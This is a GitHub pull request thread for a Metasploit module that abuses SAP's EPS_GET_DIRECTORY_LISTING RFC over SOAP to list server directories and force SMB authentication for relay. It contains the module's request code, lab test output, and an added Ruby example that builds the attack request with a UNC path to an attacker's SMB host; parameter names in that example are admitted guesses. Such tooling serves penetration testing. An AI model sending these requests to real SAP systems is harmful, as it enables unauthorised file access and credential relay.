
EPS_GET_DIRECTORY_LISTING (List Directory and SMB Relay) #1661

Merged
merged 2 commits into from May 9, 2013

3 participants

@nmonkee
nmonkee commented Mar 25, 2013

A vulnerability in the SAP EPS RFC function group allows an attacker to execute an SMB relay attack.

@wchen-r7 wchen-r7 commented on an outdated diff Mar 26, 2013
...p/sap_soap_rfc_eps_get_directory_listing_smb_relay.rb
+ user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
+ begin
+ print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}")
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',}
+ }, 45)
+ if res
+ vprint_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
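Review bot: the `vprint_status` under `if res` reports every response as "Error code", including a 200 from a successful listing, and it interpolates `rhost` while the request line above uses `ip`; test `res.code` before labelling it an error (for example `vprint_error(...)` only when `res.code != 200`, as the reviewer suggests) and use one host variable consistently. The `begin` opened above the request also has no `rescue` visible in this hunk, so confirm that timeouts and connection failures from `send_request_raw` (45 second timeout) are actually caught rather than escaping the module.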
@wchen-r7
wchen-r7 added a note Mar 26, 2013

How about vprint_error() instead of vprint_status() ?

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 6, 2013
Merged

SAP module sap_soap_rfc_eps_get_directory_listing cleanup #8

@jvazquez-r7

Hi @nmonkee ,

nmonkee#8 tries to clean up this pull request. It's applying the same changes proposed on the last pull requests such as rapid7#1658. As always feel free to review, test, ask, discuss anything and merge this pull request on your repo when ready. So the original pull request will be automatically updated and we'll be ready to merge :)

Testing after changes:

  • Existing DIR, verbose mode on
msf auxiliary(sap_soap_rfc_eps_get_directory_listing_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to check /tmp
[+] 8042:192.168.172.179 - 16 files under /tmp
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Non existing DIR, verbose mode on
msf auxiliary(sap_soap_rfc_eps_get_directory_listing_smb_relay) > set DIR /tmp/test
DIR => /tmp/test
msf auxiliary(sap_soap_rfc_eps_get_directory_listing_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to check /tmp/test
[-] 192.168.172.179:8042 - Error code: 500
[-] 192.168.172.179:8042 - Error message: Soap document processing failed
[-] 192.168.172.179:8042 - Error body: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>READ_DIRECTORY_FAILED</faultstring><detail><rfc:EPS_GET_DIRECTORY_LISTING.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><Name>READ_DIRECTORY_FAILED</Name></rfc:EPS_GET_DIRECTORY_LISTING.Exception></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

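The request the module sends and the two kinds of response seen in the test run above, as an added Ruby example that is not the module's own code. It builds the same SOAP/RFC POST the reviewed hunk shows (URI, SOAPAction, sap-usercontext cookie, Basic auth) around an EPS_GET_DIRECTORY_LISTING call, flags when the requested directory is a UNC path (the case where the SAP application server, not the attacker, opens the SMB connection and authenticates with its own service account, which is the relay the PR title refers to), and classifies the reply. The fault body is copied from the "non existing DIR" run above; the success body is constructed, and DIR_NAME, DIR_LIST and FILE_COUNTER as the parameter names, as well as 192.0.2.10 as the attacker's SMB host, are assumptions.

```ruby
require 'base64'
require 'rexml/document'

SOAP_RFC_NS = 'urn:sap-com:document:sap:rfc:functions'

# True when the requested directory is a UNC/network path: the SAP host would
# open an SMB connection (and authenticate) to the server named in it.
def unc_path?(dir)
  dir.start_with?('\\\\', '//')
end

# Build the same kind of request the module hands to send_request_raw.
# DIR_NAME as the importing parameter name is an assumption.
def build_request(client:, user:, pass:, dir:)
  body = <<~XML
    <?xml version="1.0" encoding="utf-8"?>
    <env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/">
      <env:Body>
        <n1:EPS_GET_DIRECTORY_LISTING xmlns:n1="#{SOAP_RFC_NS}">
          <DIR_NAME>#{dir.encode(xml: :text)}</DIR_NAME>
        </n1:EPS_GET_DIRECTORY_LISTING>
      </env:Body>
    </env:Envelope>
  XML
  {
    'uri'     => "/sap/bc/soap/rfc?sap-client=#{client}&sap-language=EN",
    'method'  => 'POST',
    'data'    => body,
    'headers' => {
      'Content-Length' => body.bytesize.to_s,
      'SOAPAction'     => SOAP_RFC_NS,
      'Cookie'         => "sap-usercontext=sap-language=EN&sap-client=#{client}",
      'Authorization'  => 'Basic ' + Base64.strict_encode64("#{user}:#{pass}"),
      'Content-Type'   => 'text/xml; charset=UTF-8',
    },
  }
end

# Classify an HTTP status plus SOAP body: 401 means the credentials were
# rejected; a SOAP Fault carries the RFC exception name (READ_DIRECTORY_FAILED
# in the thread above); FILE_COUNTER as the exporting parameter is an assumption.
def parse_response(code, body)
  return { status: :auth_failed, code: code } if code == 401
  doc = REXML::Document.new(body)
  fault = REXML::XPath.first(doc, '//*[local-name()="Fault"]')
  if fault
    name = REXML::XPath.first(fault, './/*[local-name()="faultstring"]')
    return { status: :fault, code: code, name: (name && name.text) }
  end
  counter = REXML::XPath.first(doc, '//*[local-name()="FILE_COUNTER"]')
  return { status: :ok, code: code, files: counter.text.to_i } if counter
  { status: :unknown, code: code }
rescue REXML::ParseException
  { status: :unknown, code: code }
end

# Fault body copied from the "non existing DIR" test run in this thread.
SAMPLE_FAULT = '<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>READ_DIRECTORY_FAILED</faultstring><detail><rfc:EPS_GET_DIRECTORY_LISTING.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><Name>READ_DIRECTORY_FAILED</Name></rfc:EPS_GET_DIRECTORY_LISTING.Exception></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>'

# Constructed success body (element names assumed) matching "16 files under /tmp".
SAMPLE_OK = '<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><rfc:EPS_GET_DIRECTORY_LISTING.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><DIR_LIST><item><NAME>hello.txt</NAME></item></DIR_LIST><FILE_COUNTER>16</FILE_COUNTER></rfc:EPS_GET_DIRECTORY_LISTING.Response></SOAP-ENV:Body></SOAP-ENV:Envelope>'

if __FILE__ == $0
  # Hypothetical target values; 192.0.2.10 stands in for the attacker's SMB listener.
  target = '\\\\192.0.2.10\\share'
  req = build_request(client: '001', user: 'SAP*', pass: 'secret', dir: target)
  puts "relay candidate: #{unc_path?(target)}"
  puts req['data']
  p parse_response(500, SAMPLE_FAULT)
  p parse_response(200, SAMPLE_OK)
end
```

Run it stand-alone to see the envelope and the two classified replies; in a module the `parse_response` result is what decides between a `print_good` line with the file count and a `vprint_error` line with the fault name, rather than reporting every `res.code` as an error.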
@nmonkee nmonkee Merge pull request #8 from jvazquez-r7/sap_soap_rfc_eps_get_directory_listing

SAP module sap_soap_rfc_eps_get_directory_listing cleanup
0b9fb41
@nmonkee
nmonkee commented May 9, 2013

Works well. All good. One small change, though.

@jvazquez-r7

Awesome! merging!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request May 9, 2013
jvazquez-r7 Land #1661, @nmonkee's sap_soap_rfc_eps_get_directory_listing module cf05602
@jvazquez-r7 jvazquez-r7 merged commit 53c08cd into rapid7:master May 9, 2013

1 check passed: default (The Travis CI build passed)
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_eps_get_directory_listing_smb_relay branch May 9, 2013